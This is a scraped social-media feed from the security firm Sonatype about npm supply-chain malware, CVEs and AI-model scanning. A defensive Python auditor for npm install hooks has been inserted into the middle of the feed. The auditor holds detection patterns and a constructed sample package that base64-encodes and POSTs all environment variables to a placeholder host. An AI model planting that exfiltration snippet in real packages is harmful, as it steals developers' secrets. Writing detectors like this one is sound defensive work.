Sonatype Profile
Sonatype

@sonatype

Followers
11K
Following
9K
Media
8K
Statuses
16K

Develop software fearlessly.

Joined February 2010
@sonatype
Sonatype
1 month
The Latest on npm Supply Chain Attack
0
0
0
@sonatype
Sonatype
1 month
🚨 Another active attack targeting npm developers — and this one spreads itself. We break down the evolving #ShaiHulud campaign, a new wave of self-propagating malware targeting #npm publishers: ➡️ Over 180+ compromised packages tracked so far ➡️ Multi-stage payloads exfiltrate
sonatype.com
Sonatype uncovers a wormable npm software supply chain attack compromising over 180 packages, following S1ngularity and Chalk/Debug campaigns.
0
0
1
@sonatype
Sonatype
3 months
🚨 New research: Lazarus Group targets developers through open source malware Since January, Sonatype has uncovered 234 malicious packages tied to the North Korea-backed group — deployed via npm and PyPI to exfiltrate secrets, drop payloads, and surveil developers. 📦 120+ used
sonatype.com
North Korea's Lazarus Group is attacking developers via open source. Sonatype found over 200 malicious packages. Are you affected? Read the blog post.
1
2
2
@sonatype
Sonatype
4 months
In finance, trust is everything, and that extends to your #softwaresupplychain. 🔐 Sonatype is trusted by over 70% of the Fortune 100, including leading global banks and insurers, to secure their open source components and reduce software risk at scale. Explore how Sonatype
0
0
2
@sonatype
Sonatype
4 months
LLMs are powerful, but their outputs aren’t always safe. Improper output handling can lead to code injection, outages & compliance failures. Learn how Sonatype helps teams validate LLM responses before they reach production: https://t.co/1LLAKOjcUH #AIsecurity #OWASP #DevSecOps
sonatype.com
Improper LLM output handling can lead to code injection, data leaks, and compliance failures. Learn how to validate and secure LLM outputs with Sonatype.
0
1
1
@sonatype
Sonatype
5 months
Security and speed don’t have to compete. Discover how Sonatype enables teams to streamline software composition analysis (#SCA) with automated solutions that scale, reducing manual effort while enhancing their risk posture. 🔐 Read the blog: https://t.co/nJ4kbHcUAe #DevSecOps
sonatype.com
See how new automation in Sonatype Lifecycle reduces toil, cuts risk, and delivers zero-effort fixes to shrink backlogs and accelerate software delivery.
0
0
0
@sonatype
Sonatype
5 months
Java changed everything — igniting the open source revolution and redefining modern software development. In this deep dive from @thenewstack, Sonatype CTO and co-founder Brian Fox reflects on the early days of open source and the movement that followed, in conversation with
thenewstack.io
Java's revolutionary approach to open source dependency management became the blueprint for modern programming languages that followed.
0
1
2
@sonatype
Sonatype
5 months
Streamline security without slowing innovation. Discover how one financial enterprise used Sonatype Lifecycle to scale security, boost efficiency, and reduce risk: 📈 3x faster onboarding 🔍 335% more scans 🛡️ 25% fewer critical risks Read the full story:
0
0
0
@sonatype
Sonatype
5 months
Data and model poisoning attacks are on the rise — and they threaten the integrity of AI at its core. In part two of our OWASP LLM Top 10 blog series, we break down how Sonatype helps organizations detect and prevent poisoning attacks before they compromise your models. 🔍
sonatype.com
Learn how Sonatype helps prevent data and model poisoning in AI by securing training data, models, and dependencies across the software supply chain.
0
0
0
@sonatype
Sonatype
5 months
Are your AI models compliant and secure? Sonatype’s discovery of four picklescan bypasses is a wake-up call for any team using open source AI. Insecure models can silently introduce risk into your environment—long before they reach production. Read the whitepaper to strengthen
0
1
1
@sonatype
Sonatype
6 months
Software supply chain security isn’t just an IT issue anymore — it’s a boardroom priority. With attacks on open source rising 156% in 2024 and new regulations taking effect, executives must lead with proactive strategies that balance innovation, risk, and compliance. Explore
0
0
0
@sonatype
Sonatype
7 months
🚨 Software attacks are on the rise — and regulators are responding. https://t.co/0elGVb4UmN Our latest executive brief with The Futurum Group explains why 2025 is a defining year for software security, compliance, and board-level accountability. Learn what every executive
0
0
1
@sonatype
Sonatype
7 months
A new Apache Tomcat vulnerability (CVE-2025-24813) was exploited within hours of disclosure, and the threat is real and growing. Learn why this flaw is so dangerous, and what teams must do to stay protected. https://t.co/Mxf2gxXZDq #ApacheTomcat #CyberSecurity
sonatype.com
A critical Apache Tomcat vulnerability (CVE-2025-24813) was exploited 30 hours after disclosure. Vulnerable versions were downloaded 100K times post-PoC.
0
0
1
@sonatype
Sonatype
7 months
Open source malware isn’t slowing down. It’s getting smarter. Sonatype’s Open Source Malware Index Q1 2025 reveals a sharp rise in data exfiltration attacks targeting developers — and the stakes are only getting higher. 📈 17,954 new malicious packages identified 📤 56% of them
0
2
3
@sonatype
Sonatype
7 months
🚨 A data exfiltration campaign was discovered with 10 popular npm crypto packages hijacked — now repurposed to steal sensitive environment variables from unsuspecting developers. https://t.co/kapBXybmmz Some of these components have been trusted for nearly a decade and
sonatype.com
Multiple hijacked npm cryptocurrency packages exfiltrate sensitive environment variables via obfuscated scripts and pose risks to open source ecosystems.
0
0
0
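The hijacked crypto packages above, like the self-propagating Shai-Hulud campaign earlier in this feed, reach developers through code that npm runs on install. The following is an added example, not code from Sonatype or from any package named on this page: it walks a node_modules tree, looks at each package's lifecycle hooks (preinstall, install, postinstall, prepare), follows the local .js files those commands invoke, and flags a hook that both reads process.env and opens a network connection, or that looks obfuscated. The indicator patterns, the package names and the sample scripts are all constructed for the example; the three packages it audits are written into a temporary directory by build_sample_tree and are never installed or executed.

```python
"""Flag npm lifecycle scripts that read the environment and reach the network."""
import json
import re
import tempfile
from pathlib import Path

# Hooks npm runs automatically during `npm install`, with no action by the developer.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators. These are assumptions for this example, not a published
# detection rule. Literal matching is easy to defeat, which is why "obfuscation"
# is itself treated as a finding rather than only as supporting evidence.
INDICATORS = {
    "env_access": re.compile(r"process\.env\b"),
    "network": re.compile(
        r"\b(?:https?\.request|https?\.get|fetch|net\.connect|dns\.resolve\w*)\s*\("),
    "encoding": re.compile(
        r"\bBuffer\.from\s*\(|\bbtoa\s*\(|toString\(\s*['\"]base64['\"]\s*\)"),
    "obfuscation": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|(?:\\x[0-9a-fA-F]{2}){16,}|['\"][A-Za-z0-9+/=]{120,}['\"]"),
}


def _collect_sources(pkg_dir: Path, command: str) -> str:
    """Return the hook command plus the text of any local script files it invokes."""
    parts = [command]
    for token in command.split():
        token = token.strip("'\"")
        if token.endswith((".js", ".cjs", ".mjs")):
            target = pkg_dir / token
            if target.is_file():
                parts.append(target.read_text(encoding="utf-8", errors="replace"))
    return "\n".join(parts)


def audit_package(pkg_dir: Path) -> list[dict]:
    """One finding per lifecycle hook that has the exfiltration shape or looks obfuscated."""
    manifest = pkg_dir / "package.json"
    if not manifest.is_file():
        return []
    try:
        meta = json.loads(manifest.read_text(encoding="utf-8"))
    except (json.JSONDecodeError, UnicodeDecodeError):
        return []
    scripts = meta.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str) or not command.strip():
            continue
        source = _collect_sources(pkg_dir, command)
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
        # Reading the environment and talking to the network from an install hook
        # is the shape described on this page; obfuscation alone also warrants a look.
        exfil_shape = "env_access" in hits and "network" in hits
        if exfil_shape or "obfuscation" in hits:
            findings.append({"package": meta.get("name", pkg_dir.name), "hook": hook,
                             "command": command, "indicators": hits})
    return findings


def audit_node_modules(root: Path) -> list[dict]:
    """Audit every package.json under root (nested node_modules included)."""
    findings = []
    for manifest in root.rglob("package.json"):
        findings.extend(audit_package(manifest.parent))
    return sorted(findings, key=lambda f: (f["package"], f["hook"]))


def build_sample_tree(root: Path) -> None:
    """Write three constructed packages: benign, env-var stealer, obfuscated loader."""
    def write_pkg(name: str, version: str, hook_cmd: str, script: str) -> None:
        pkg = root / "node_modules" / name
        (pkg / "scripts").mkdir(parents=True)
        (pkg / "package.json").write_text(json.dumps(
            {"name": name, "version": version, "scripts": {"postinstall": hook_cmd}}))
        (pkg / "scripts" / "setup.js").write_text(script)

    write_pkg("left-pad-ish", "1.0.0", "node scripts/setup.js",
              "console.log('thanks for installing');\n")
    write_pkg("crypto-utils-ish", "4.2.0", "node scripts/setup.js",
              "const https = require('https');\n"
              "const data = Buffer.from(JSON.stringify(process.env)).toString('base64');\n"
              "const req = https.request({host: 'example.invalid', path: '/', method: 'POST'});\n"
              "req.write(data); req.end();\n")
    # The base64 literal decodes to console.log(1); the eval pattern is what gets flagged.
    write_pkg("obfuscated-ish", "0.0.3", "node scripts/setup.js",
              "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());\n")


def demo() -> list[dict]:
    """Build the sample tree in a temp dir and return the audit findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return audit_node_modules(root / "node_modules")


if __name__ == "__main__":
    for f in demo():
        print(f"{f['package']} [{f['hook']}] {f['command']} -> {', '.join(f['indicators'])}")
```

Run it against a real checkout by calling audit_node_modules(Path("node_modules")) instead of demo(). Two caveats apply in practice: a hook can invoke a binary or a remote script rather than a local .js file, which this pass does not follow, and a finding is a reason to read the script, not proof of malice; plenty of legitimate native-build hooks read the environment.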
@sonatype
Sonatype
7 months
AI-driven supply chains need secure foundations. Gartner® highlights how AI-powered software solutions are the future of supply chain management, delivering efficiency, transparency, and resilience. https://t.co/Em4q24CrAe Sonatype enables organizations to secure their software
0
0
1
@sonatype
Sonatype
8 months
Malware attacks against government organizations are escalating—fast. 🚨 https://t.co/oncLgQhjCo In 2024 alone, over 300,000 malware attacks targeted federal agencies, making up 67.31% of all attempted attacks blocked by Sonatype. Traditional security measures are no longer
0
0
1
@sonatype
Sonatype
8 months
We’re proud to announce that Sonatype has been recognized by the 2025 Cybersecurity Excellence Awards! These wins highlight our commitment to securing the software supply chain by providing intelligent automation, advanced SBOM management, and proactive risk mitigation. Sonatype
0
1
2
@sonatype
Sonatype
8 months
Sonatype has discovered and responsibly disclosed four vulnerabilities in picklescan, a tool designed to detect unsafe Python pickle files in AI/ML models. These vulnerabilities, now fixed, could allow attackers to slip malicious models past its defenses. This discovery is a
0
0
2
@sonatype
Sonatype
8 months
Fake IP checker utilities like “node-request-ip” are spreading trojans and crypto stealers across Windows, Linux, and macOS. Sonatype detected and blocked these threats—but it’s a reminder that attackers are evolving. Read the full breakdown and stay ahead of emerging threats:
sonatype.com
Crypto stealers are posing as IP checker utilities on npm, targeting Windows, Linux and macOS users with new open source malware campaigns.
0
0
1